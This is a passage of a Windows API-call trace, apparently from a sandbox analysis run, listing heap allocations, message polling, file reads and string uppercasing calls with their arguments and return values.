wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0208.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ed020 [0208.482] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.482] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x9417, lpOverlapped=0x0) returned 1 [0208.484] ReadFile (in: hFile=0x524, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9417) returned 0x2a9a140 [0208.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9417) returned 0x2aae878 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9417) returned 0x2a9a140 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0208.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.490] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9417) returned 0x2a9a140 [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaab0 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0208.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9417) returned 0x2ab7c98 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0208.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0208.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0208.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.492] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0208.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac48 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0208.496] RtlAllocateHeap 